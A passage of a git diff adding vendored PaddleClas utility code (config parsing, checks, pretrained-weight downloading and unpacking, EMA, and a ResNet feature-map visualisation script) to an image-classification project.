"eval_interval"] == 0: + top1_acc = program.run(eval_dataloader, exe, compiled_eval_prog, + eval_feeds, eval_fetchs, epoch_id, "eval", + config) + if top1_acc > best_top1_acc: + best_top1_acc = top1_acc + message = "The best top1 acc {:.5f}, in epoch: {:d}".format( + best_top1_acc, epoch_id) + logger.info(message) + if epoch_id % global_config["save_interval"] == 0: + + model_path = os.path.join(global_config["output_dir"], + config["Arch"]["name"]) + save_model(train_prog, model_path, "best_model") + + # 3. save the persistable model + if epoch_id % global_config["save_interval"] == 0: + model_path = os.path.join(global_config["output_dir"], + config["Arch"]["name"]) + save_model(train_prog, model_path, epoch_id) + + +if __name__ == '__main__': + paddle.enable_static() + args = parse_args() + main(args) diff --git a/Smart_container/PaddleClas/ppcls/utils/__init__.py b/Smart_container/PaddleClas/ppcls/utils/__init__.py new file mode 100644 index 0000000..632cc78 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/__init__.py @@ -0,0 +1,27 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from . import logger +from . import misc +from . import model_zoo +from . import metrics + +from .save_load import init_model, save_model +from .config import get_config +from .misc import AverageMeter +from .metrics import multi_hot_encode +from .metrics import hamming_distance +from .metrics import accuracy_score +from .metrics import precision_recall_fscore +from .metrics import mean_average_precision diff --git a/Smart_container/PaddleClas/ppcls/utils/check.py b/Smart_container/PaddleClas/ppcls/utils/check.py new file mode 100644 index 0000000..bc70308 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/check.py @@ -0,0 +1,151 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import sys + +import paddle +from paddle import is_compiled_with_cuda + +from ppcls.arch import get_architectures +from ppcls.arch import similar_architectures +from ppcls.arch import get_blacklist_model_in_static_mode +from ppcls.utils import logger + + +def check_version(): + """ + Log error and exit when the installed version of paddlepaddle is + not satisfied. + """ + err = "PaddlePaddle version 1.8.0 or higher is required, " \ + "or a suitable develop version is satisfied as well. \n" \ + "Please make sure the version is good with your code." + try: + pass + # paddle.utils.require_version('0.0.0') + except Exception: + logger.error(err) + sys.exit(1) + + +def check_gpu(): + """ + Log error and exit when using paddlepaddle cpu version. + """ + err = "You are using paddlepaddle cpu version! Please try to " \ + "install paddlepaddle-gpu to run model on GPU." + + try: + assert is_compiled_with_cuda() + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_architecture(architecture): + """ + check architecture and recommend similar architectures + """ + assert isinstance(architecture, dict), \ + ("the type of architecture({}) should be dict". format(architecture)) + assert "name" in architecture, \ + ("name must be in the architecture keys, just contains: {}". format( + architecture.keys())) + + similar_names = similar_architectures(architecture["name"], + get_architectures()) + model_list = ', '.join(similar_names) + err = "Architecture [{}] is not exist! Maybe you want: [{}]" \ + "".format(architecture["name"], model_list) + try: + assert architecture["name"] in similar_names + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_model_with_running_mode(architecture): + """ + check whether the model is consistent with the operating mode + """ + # some model are not supported in the static mode + blacklist = get_blacklist_model_in_static_mode() + if not paddle.in_dynamic_mode() and architecture["name"] in blacklist: + logger.error("Model: {} is not supported in the staic mode.".format( + architecture["name"])) + sys.exit(1) + return + + +def check_mix(architecture, use_mix=False): + """ + check mix parameter + """ + err = "Cannot use mix processing in GoogLeNet, " \ + "please set use_mix = False." + try: + if architecture["name"] == "GoogLeNet": + assert use_mix is not True + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_classes_num(classes_num): + """ + check classes_num + """ + err = "classes_num({}) should be a positive integer" \ + "and larger than 1".format(classes_num) + try: + assert isinstance(classes_num, int) + assert classes_num > 1 + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_data_dir(path): + """ + check cata_dir + """ + err = "Data path is not exist, please given a right path" \ + "".format(path) + try: + assert os.isdir(path) + except AssertionError: + logger.error(err) + sys.exit(1) + + +def check_function_params(config, key): + """ + check specify config + """ + k_config = config.get(key) + assert k_config is not None, \ + ('{} is required in config'.format(key)) + + assert k_config.get('function'), \ + ('function is required {} config'.format(key)) + params = k_config.get('params') + assert params is not None, \ + ('params is required in {} config'.format(key)) + assert isinstance(params, dict), \ + ('the params in {} config should be a dict'.format(key)) diff --git a/Smart_container/PaddleClas/ppcls/utils/config.py b/Smart_container/PaddleClas/ppcls/utils/config.py new file mode 100644 index 0000000..b92f0d9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/config.py @@ -0,0 +1,203 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import copy +import argparse +import yaml +from ppcls.utils import logger +from ppcls.utils import check +__all__ = ['get_config'] + + +class AttrDict(dict): + def __getattr__(self, key): + return self[key] + + def __setattr__(self, key, value): + if key in self.__dict__: + self.__dict__[key] = value + else: + self[key] = value + + def __deepcopy__(self, content): + return copy.deepcopy(dict(self)) + + +def create_attr_dict(yaml_config): + from ast import literal_eval + for key, value in yaml_config.items(): + if type(value) is dict: + yaml_config[key] = value = AttrDict(value) + if isinstance(value, str): + try: + value = literal_eval(value) + except BaseException: + pass + if isinstance(value, AttrDict): + create_attr_dict(yaml_config[key]) + else: + yaml_config[key] = value + + +def parse_config(cfg_file): + """Load a config file into AttrDict""" + with open(cfg_file, 'r') as fopen: + yaml_config = AttrDict(yaml.load(fopen, Loader=yaml.SafeLoader)) + create_attr_dict(yaml_config) + return yaml_config + + +def print_dict(d, delimiter=0): + """ + Recursively visualize a dict and + indenting acrrording by the relationship of keys. + """ + placeholder = "-" * 60 + for k, v in sorted(d.items()): + if isinstance(v, dict): + logger.info("{}{} : ".format(delimiter * " ", k)) + print_dict(v, delimiter + 4) + elif isinstance(v, list) and len(v) >= 1 and isinstance(v[0], dict): + logger.info("{}{} : ".format(delimiter * " ", k)) + for value in v: + print_dict(value, delimiter + 4) + else: + logger.info("{}{} : {}".format(delimiter * " ", k, v)) + if k.isupper(): + logger.info(placeholder) + + +def print_config(config): + """ + visualize configs + Arguments: + config: configs + """ + logger.advertise() + print_dict(config) + + +def check_config(config): + """ + Check config + """ + check.check_version() + use_gpu = config.get('use_gpu', True) + if use_gpu: + check.check_gpu() + architecture = config.get('ARCHITECTURE') + #check.check_architecture(architecture) + use_mix = config.get('use_mix', False) + check.check_mix(architecture, use_mix) + classes_num = config.get('classes_num') + check.check_classes_num(classes_num) + mode = config.get('mode', 'train') + if mode.lower() == 'train': + check.check_function_params(config, 'LEARNING_RATE') + check.check_function_params(config, 'OPTIMIZER') + + +def override(dl, ks, v): + """ + Recursively replace dict of list + Args: + dl(dict or list): dict or list to be replaced + ks(list): list of keys + v(str): value to be replaced + """ + + def str2num(v): + try: + return eval(v) + except Exception: + return v + + assert isinstance(dl, (list, dict)), ("{} should be a list or a dict") + assert len(ks) > 0, ('lenght of keys should larger than 0') + if isinstance(dl, list): + k = str2num(ks[0]) + if len(ks) == 1: + assert k < len(dl), ('index({}) out of range({})'.format(k, dl)) + dl[k] = str2num(v) + else: + override(dl[k], ks[1:], v) + else: + if len(ks) == 1: + # assert ks[0] in dl, ('{} is not exist in {}'.format(ks[0], dl)) + if not ks[0] in dl: + print('A new filed ({}) detected!'.format(ks[0], dl)) + dl[ks[0]] = str2num(v) + else: + override(dl[ks[0]], ks[1:], v) + + +def override_config(config, options=None): + """ + Recursively override the config + Args: + config(dict): dict to be replaced + options(list): list of pairs(key0.key1.idx.key2=value) + such as: [ + 'topk=2', + 'VALID.transforms.1.ResizeImage.resize_short=300' + ] + Returns: + config(dict): replaced config + """ + if options is not None: + for opt in options: + assert isinstance(opt, str), ( + "option({}) should be a str".format(opt)) + assert "=" in opt, ( + "option({}) should contain a =" + "to distinguish between key and value".format(opt)) + pair = opt.split('=') + assert len(pair) == 2, ("there can be only a = in the option") + key, value = pair + keys = key.split('.') + override(config, keys, value) + return config + + +def get_config(fname, overrides=None, show=False): + """ + Read config from file + """ + assert os.path.exists(fname), ( + 'config file({}) is not exist'.format(fname)) + config = parse_config(fname) + override_config(config, overrides) + if show: + print_config(config) + # check_config(config) + return config + + +def parse_args(): + parser = argparse.ArgumentParser("generic-image-rec train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/config.yaml', + help='config file path') + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + args = parser.parse_args() + return args diff --git a/Smart_container/PaddleClas/ppcls/utils/download.py b/Smart_container/PaddleClas/ppcls/utils/download.py new file mode 100644 index 0000000..9c45750 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/download.py @@ -0,0 +1,319 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import sys +import os.path as osp +import shutil +import requests +import hashlib +import tarfile +import zipfile +import time +from collections import OrderedDict +from tqdm import tqdm + +from ppcls.utils import logger + +__all__ = ['get_weights_path_from_url'] + +WEIGHTS_HOME = osp.expanduser("~/.paddleclas/weights") + +DOWNLOAD_RETRY_LIMIT = 3 + + +def is_url(path): + """ + Whether path is URL. + Args: + path (string): URL string or not. + """ + return path.startswith('http://') or path.startswith('https://') + + +def get_weights_path_from_url(url, md5sum=None): + """Get weights path from WEIGHT_HOME, if not exists, + download it from url. + + Args: + url (str): download url + md5sum (str): md5 sum of download package + + Returns: + str: a local path to save downloaded weights. + + Examples: + .. code-block:: python + + from paddle.utils.download import get_weights_path_from_url + + resnet18_pretrained_weight_url = 'https://paddle-hapi.bj.bcebos.com/models/resnet18.pdparams' + local_weight_path = get_weights_path_from_url(resnet18_pretrained_weight_url) + + """ + path = get_path_from_url(url, WEIGHTS_HOME, md5sum) + return path + + +def _map_path(url, root_dir): + # parse path after download under root_dir + fname = osp.split(url)[-1] + fpath = fname + return osp.join(root_dir, fpath) + + +def _get_unique_endpoints(trainer_endpoints): + # Sorting is to avoid different environmental variables for each card + trainer_endpoints.sort() + ips = set() + unique_endpoints = set() + for endpoint in trainer_endpoints: + ip = endpoint.split(":")[0] + if ip in ips: + continue + ips.add(ip) + unique_endpoints.add(endpoint) + logger.info("unique_endpoints {}".format(unique_endpoints)) + return unique_endpoints + + +def get_path_from_url(url, + root_dir, + md5sum=None, + check_exist=True, + decompress=True): + """ Download from given url to root_dir. + if file or directory specified by url is exists under + root_dir, return the path directly, otherwise download + from url and decompress it, return the path. + + Args: + url (str): download url + root_dir (str): root dir for downloading, it should be + WEIGHTS_HOME or DATASET_HOME + md5sum (str): md5 sum of download package + + Returns: + str: a local path to save downloaded models & weights & datasets. + """ + + from paddle.fluid.dygraph.parallel import ParallelEnv + + assert is_url(url), "downloading from {} not a url".format(url) + # parse path after download to decompress under root_dir + fullpath = _map_path(url, root_dir) + # Mainly used to solve the problem of downloading data from different + # machines in the case of multiple machines. Different ips will download + # data, and the same ip will only download data once. + unique_endpoints = _get_unique_endpoints(ParallelEnv() + .trainer_endpoints[:]) + if osp.exists(fullpath) and check_exist and _md5check(fullpath, md5sum): + logger.info("Found {}".format(fullpath)) + else: + if ParallelEnv().current_endpoint in unique_endpoints: + fullpath = _download(url, root_dir, md5sum) + else: + while not os.path.exists(fullpath): + time.sleep(1) + + if ParallelEnv().current_endpoint in unique_endpoints: + if decompress and (tarfile.is_tarfile(fullpath) or + zipfile.is_zipfile(fullpath)): + fullpath = _decompress(fullpath) + + return fullpath + + +def _download(url, path, md5sum=None): + """ + Download from url, save to path. + + url (str): download url + path (str): download to given path + """ + if not osp.exists(path): + os.makedirs(path) + + fname = osp.split(url)[-1] + fullname = osp.join(path, fname) + retry_cnt = 0 + + while not (osp.exists(fullname) and _md5check(fullname, md5sum)): + if retry_cnt < DOWNLOAD_RETRY_LIMIT: + retry_cnt += 1 + else: + raise RuntimeError("Download from {} failed. " + "Retry limit reached".format(url)) + + logger.info("Downloading {} from {}".format(fname, url)) + + try: + req = requests.get(url, stream=True) + except Exception as e: # requests.exceptions.ConnectionError + logger.info( + "Downloading {} from {} failed {} times with exception {}". + format(fname, url, retry_cnt + 1, str(e))) + time.sleep(1) + continue + + if req.status_code != 200: + raise RuntimeError("Downloading from {} failed with code " + "{}!".format(url, req.status_code)) + + # For protecting download interupted, download to + # tmp_fullname firstly, move tmp_fullname to fullname + # after download finished + tmp_fullname = fullname + "_tmp" + total_size = req.headers.get('content-length') + with open(tmp_fullname, 'wb') as f: + if total_size: + with tqdm(total=(int(total_size) + 1023) // 1024) as pbar: + for chunk in req.iter_content(chunk_size=1024): + f.write(chunk) + pbar.update(1) + else: + for chunk in req.iter_content(chunk_size=1024): + if chunk: + f.write(chunk) + shutil.move(tmp_fullname, fullname) + + return fullname + + +def _md5check(fullname, md5sum=None): + if md5sum is None: + return True + + logger.info("File {} md5 checking...".format(fullname)) + md5 = hashlib.md5() + with open(fullname, 'rb') as f: + for chunk in iter(lambda: f.read(4096), b""): + md5.update(chunk) + calc_md5sum = md5.hexdigest() + + if calc_md5sum != md5sum: + logger.info("File {} md5 check failed, {}(calc) != " + "{}(base)".format(fullname, calc_md5sum, md5sum)) + return False + return True + + +def _decompress(fname): + """ + Decompress for zip and tar file + """ + logger.info("Decompressing {}...".format(fname)) + + # For protecting decompressing interupted, + # decompress to fpath_tmp directory firstly, if decompress + # successed, move decompress files to fpath and delete + # fpath_tmp and remove download compress file. + + if tarfile.is_tarfile(fname): + uncompressed_path = _uncompress_file_tar(fname) + elif zipfile.is_zipfile(fname): + uncompressed_path = _uncompress_file_zip(fname) + else: + raise TypeError("Unsupport compress file type {}".format(fname)) + + return uncompressed_path + + +def _uncompress_file_zip(filepath): + files = zipfile.ZipFile(filepath, 'r') + file_list = files.namelist() + + file_dir = os.path.dirname(filepath) + + if _is_a_single_file(file_list): + rootpath = file_list[0] + uncompressed_path = os.path.join(file_dir, rootpath) + + for item in file_list: + files.extract(item, file_dir) + + elif _is_a_single_dir(file_list): + rootpath = os.path.splitext(file_list[0])[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + + for item in file_list: + files.extract(item, file_dir) + + else: + rootpath = os.path.splitext(filepath)[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + if not os.path.exists(uncompressed_path): + os.makedirs(uncompressed_path) + for item in file_list: + files.extract(item, os.path.join(file_dir, rootpath)) + + files.close() + + return uncompressed_path + + +def _uncompress_file_tar(filepath, mode="r:*"): + files = tarfile.open(filepath, mode) + file_list = files.getnames() + + file_dir = os.path.dirname(filepath) + + if _is_a_single_file(file_list): + rootpath = file_list[0] + uncompressed_path = os.path.join(file_dir, rootpath) + for item in file_list: + files.extract(item, file_dir) + elif _is_a_single_dir(file_list): + rootpath = os.path.splitext(file_list[0])[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + for item in file_list: + files.extract(item, file_dir) + else: + rootpath = os.path.splitext(filepath)[0].split(os.sep)[-1] + uncompressed_path = os.path.join(file_dir, rootpath) + if not os.path.exists(uncompressed_path): + os.makedirs(uncompressed_path) + + for item in file_list: + files.extract(item, os.path.join(file_dir, rootpath)) + + files.close() + + return uncompressed_path + + +def _is_a_single_file(file_list): + if len(file_list) == 1 and file_list[0].find(os.sep) < -1: + return True + return False + + +def _is_a_single_dir(file_list): + new_file_list = [] + for file_path in file_list: + if '/' in file_path: + file_path = file_path.replace('/', os.sep) + elif '\\' in file_path: + file_path = file_path.replace('\\', os.sep) + new_file_list.append(file_path) + + file_name = new_file_list[0].split(os.sep)[0] + for i in range(1, len(new_file_list)): + if file_name != new_file_list[i].split(os.sep)[0]: + return False + return True diff --git a/Smart_container/PaddleClas/ppcls/utils/ema.py b/Smart_container/PaddleClas/ppcls/utils/ema.py new file mode 100644 index 0000000..e41f472 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/ema.py @@ -0,0 +1,58 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import paddle +import numpy as np + + +class ExponentialMovingAverage(): + def __init__(self, model, decay, thres_steps=True): + self._model = model + self._decay = decay + self._thres_steps = thres_steps + self._shadow = {} + self._backup = {} + + def register(self): + self._update_step = 0 + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + self._shadow[name] = param.numpy().copy() + + def update(self): + decay = min(self._decay, (1 + self._update_step) / ( + 10 + self._update_step)) if self._thres_steps else self._decay + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._shadow + new_val = np.array(param.numpy().copy()) + old_val = np.array(self._shadow[name]) + new_average = decay * old_val + (1 - decay) * new_val + self._shadow[name] = new_average + self._update_step += 1 + return decay + + def apply(self): + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._shadow + self._backup[name] = np.array(param.numpy().copy()) + param.set_value(np.array(self._shadow[name])) + + def restore(self): + for name, param in self._model.named_parameters(): + if param.stop_gradient is False: + assert name in self._backup + param.set_value(self._backup[name]) + self._backup = {} diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh new file mode 100644 index 0000000..286c240 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/download_resnet50_pretrained.sh @@ -0,0 +1,2 @@ +wget https://paddle-imagenet-models-name.bj.bcebos.com/ResNet50_pretrained.tar +tar -xf ResNet50_pretrained.tar \ No newline at end of file diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/fm_vis.py b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/fm_vis.py new file mode 100644 index 0000000..d8ee125 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/fm_vis.py @@ -0,0 +1,102 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import numpy as np +import cv2 +import utils +import argparse +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(__dir__) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../..'))) + +import paddle +from paddle.distributed import ParallelEnv + +from resnet import ResNet50 +from ppcls.utils.save_load import load_dygraph_pretrain + + +def parse_args(): + def str2bool(v): + return v.lower() in ("true", "t", "1") + + parser = argparse.ArgumentParser() + parser.add_argument("-i", "--image_file", type=str) + parser.add_argument("-c", "--channel_num", type=int) + parser.add_argument("-p", "--pretrained_model", type=str) + parser.add_argument("--show", type=str2bool, default=False) + parser.add_argument("--interpolation", type=int, default=1) + parser.add_argument("--save_path", type=str, default=None) + parser.add_argument("--use_gpu", type=str2bool, default=True) + parser.add_argument( + "--load_static_weights", + type=str2bool, + default=False, + help='Whether to load the pretrained weights saved in static mode') + + return parser.parse_args() + + +def create_operators(interpolation=1): + size = 224 + img_mean = [0.485, 0.456, 0.406] + img_std = [0.229, 0.224, 0.225] + img_scale = 1.0 / 255.0 + + resize_op = utils.ResizeImage( + resize_short=256, interpolation=interpolation) + crop_op = utils.CropImage(size=(size, size)) + normalize_op = utils.NormalizeImage( + scale=img_scale, mean=img_mean, std=img_std) + totensor_op = utils.ToTensor() + + return [resize_op, crop_op, normalize_op, totensor_op] + + +def preprocess(data, ops): + for op in ops: + data = op(data) + return data + + +def main(): + args = parse_args() + operators = create_operators(args.interpolation) + # assign the place + place = 'gpu:{}'.format(ParallelEnv().dev_id) if args.use_gpu else 'cpu' + place = paddle.set_device(place) + + net = ResNet50() + load_dygraph_pretrain(net, args.pretrained_model, args.load_static_weights) + + img = cv2.imread(args.image_file, cv2.IMREAD_COLOR) + data = preprocess(img, operators) + data = np.expand_dims(data, axis=0) + data = paddle.to_tensor(data) + net.eval() + _, fm = net(data) + assert args.channel_num >= 0 and args.channel_num <= fm.shape[ + 1], "the channel is out of the range, should be in {} but got {}".format( + [0, fm.shape[1]], args.channel_num) + + fm = (np.squeeze(fm[0][args.channel_num].numpy()) * 255).astype(np.uint8) + fm = cv2.resize(fm, (img.shape[1], img.shape[0])) + if args.save_path is not None: + print("the feature map is saved in path: {}".format(args.save_path)) + cv2.imwrite(args.save_path, fm) + + +if __name__ == "__main__": + main() diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/resnet.py b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/resnet.py new file mode 100644 index 0000000..b0171f8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/resnet.py @@ -0,0 +1,293 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +__all__ = ["ResNet18", "ResNet34", "ResNet50", "ResNet101", "ResNet152"] + + +class ConvBNLayer(nn.Layer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act=None, + name=None): + super(ConvBNLayer, self).__init__() + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + "_scale"), + bias_attr=ParamAttr(bn_name + "_offset"), + moving_mean_name=bn_name + "_mean", + moving_variance_name=bn_name + "_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act="relu", + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu", + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + self._num_channels_out = num_filters * 4 + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class BasicBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + name=None): + super(BasicBlock, self).__init__() + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu", + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + name=name + "_branch2b") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=stride, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=conv1) + y = F.relu(y) + return y + + +class ResNet(nn.Layer): + def __init__(self, layers=50, class_dim=1000): + super(ResNet, self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.feature_map = None + + self.conv = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=7, + stride=2, + act="relu", + name="conv1") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + conv_name, + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + conv_name, + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_dim, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_0.w_0"), + bias_attr=ParamAttr(name="fc_0.b_0")) + + def forward(self, inputs): + y = self.conv(inputs) + y = self.pool2d_max(y) + self.feature_map = y + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y, self.feature_map + + +def ResNet18(**args): + model = ResNet(layers=18, **args) + return model + + +def ResNet34(**args): + model = ResNet(layers=34, **args) + return model + + +def ResNet50(**args): + model = ResNet(layers=50, **args) + return model + + +def ResNet101(**args): + model = ResNet(layers=101, **args) + return model + + +def ResNet152(**args): + model = ResNet(layers=152, **args) + return model diff --git a/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/utils.py b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/utils.py new file mode 100644 index 0000000..7c70149 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/feature_maps_visualization/utils.py @@ -0,0 +1,85 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import cv2 +import 